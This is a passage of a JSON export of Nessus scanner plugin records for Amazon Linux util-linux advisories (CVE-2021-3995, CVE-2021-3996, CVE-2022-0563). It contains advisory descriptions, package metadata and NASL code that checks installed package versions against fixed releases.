{'reference':'python3-libmount-debuginfo-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-debuginfo-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-debuginfo-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-debuginfo-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debuginfo-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debuginfo-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debuginfo-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debugsource-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debugsource-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debugsource-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-debuginfo-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-debuginfo-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-debuginfo-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-debuginfo-2.37.4-1.amzn2022', 'cpu':'aarch64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-debuginfo-2.37.4-1.amzn2022', 'cpu':'i686', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-debuginfo-2.37.4-1.amzn2022', 'cpu':'x86_64', 'release':'AL-2022', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && release && (!exists_check || rpm_exists(release:release, rpm:exists_check))) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libblkid / libblkid-debuginfo / libblkid-devel / etc\");\n}", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T16:45:50", "description": "It is, therefore, affected by multiple vulnerabilities as referenced in the ALAS2023-2023-024 advisory.\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3995)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable directory. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3996)\n\n - A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an INPUTRC environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation.\n This flaw affects util-linux versions prior to 2.37.4. (CVE-2022-0563)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-03-21T00:00:00", "type": "nessus", "title": "Amazon Linux 2023 : libblkid, libblkid-devel, libfdisk (ALAS2023-2023-024)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-3995", "CVE-2021-3996", "CVE-2022-0563"], "modified": "2023-04-20T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:libblkid", "p-cpe:/a:amazon:linux:libblkid-debuginfo", "p-cpe:/a:amazon:linux:libblkid-devel", "p-cpe:/a:amazon:linux:libfdisk", "p-cpe:/a:amazon:linux:libfdisk-debuginfo", "p-cpe:/a:amazon:linux:libfdisk-devel", "p-cpe:/a:amazon:linux:libmount", "p-cpe:/a:amazon:linux:libmount-debuginfo", "p-cpe:/a:amazon:linux:libmount-devel", "p-cpe:/a:amazon:linux:libsmartcols", "p-cpe:/a:amazon:linux:libsmartcols-debuginfo", "p-cpe:/a:amazon:linux:libsmartcols-devel", "p-cpe:/a:amazon:linux:libuuid", "p-cpe:/a:amazon:linux:libuuid-debuginfo", "p-cpe:/a:amazon:linux:libuuid-devel", "p-cpe:/a:amazon:linux:python3-libmount", "p-cpe:/a:amazon:linux:python3-libmount-debuginfo", "p-cpe:/a:amazon:linux:util-linux", "p-cpe:/a:amazon:linux:util-linux-core", "p-cpe:/a:amazon:linux:util-linux-core-debuginfo", "p-cpe:/a:amazon:linux:util-linux-debuginfo", "p-cpe:/a:amazon:linux:util-linux-debugsource", "p-cpe:/a:amazon:linux:util-linux-user", "p-cpe:/a:amazon:linux:util-linux-user-debuginfo", "p-cpe:/a:amazon:linux:uuidd", "p-cpe:/a:amazon:linux:uuidd-debuginfo", "cpe:/o:amazon:linux:2023"], "id": "AL2023_ALAS2023-2023-024.NASL", "href": "https://www.tenable.com/plugins/nessus/173184", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2023 Security Advisory ALAS2023-2023-024.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(173184);\n script_version(\"1.1\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/20\");\n\n script_cve_id(\"CVE-2021-3995\", \"CVE-2021-3996\", \"CVE-2022-0563\");\n\n script_name(english:\"Amazon Linux 2023 : libblkid, libblkid-devel, libfdisk (ALAS2023-2023-024)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Amazon Linux 2023 host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"It is, therefore, affected by multiple vulnerabilities as referenced in the ALAS2023-2023-024 advisory.\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE\n filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker\n in its string form. An attacker may use this flaw to cause a denial of service to applications that use\n the affected filesystems. (CVE-2021-3995)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged\n user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other\n users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable\n directory. An attacker may use this flaw to cause a denial of service to applications that use the\n affected filesystems. (CVE-2021-3996)\n\n - A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The\n Readline library uses an INPUTRC environment variable to get a path to the library config file. When the\n library cannot parse the specified file, it prints an error message containing data from the file. This\n flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation.\n This flaw affects util-linux versions prior to 2.37.4. (CVE-2022-0563)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/AL2023/ALAS-2023-024.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-3995.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2021-3996.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/cve/html/CVE-2022-0563.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://alas.aws.amazon.com/faqs.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Run 'dnf update util-linux --releasever=2023.0.20230222 ' to update your system.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-0563\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/02/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/02/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/03/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libblkid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libblkid-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libblkid-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libfdisk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libfdisk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libfdisk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libmount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libmount-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libmount-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libsmartcols\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libsmartcols-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libsmartcols-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libuuid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libuuid-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:libuuid-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python3-libmount\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:python3-libmount-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-core-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-user\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:util-linux-user-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:uuidd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:uuidd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2023\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar alas_release = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(alas_release) || !strlen(alas_release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nvar os_ver = pregmatch(pattern: \"^AL(A|\\d+|-\\d+)\", string:alas_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"-2023\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2023\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar pkgs = [\n {'reference':'libblkid-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-devel-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-devel-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libblkid-devel-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-devel-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-devel-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libfdisk-devel-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-devel-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-devel-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libmount-devel-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-devel-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-devel-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libsmartcols-devel-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-devel-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-devel-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'libuuid-devel-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'python3-libmount-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-core-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debugsource-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debugsource-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-debugsource-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'util-linux-user-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'aarch64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'i686', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'uuidd-debuginfo-2.37.4-1.amzn2023.0.3', 'cpu':'x86_64', 'release':'AL-2023', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && _release && (!exists_check || rpm_exists(release:_release, rpm:exists_check))) {\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n 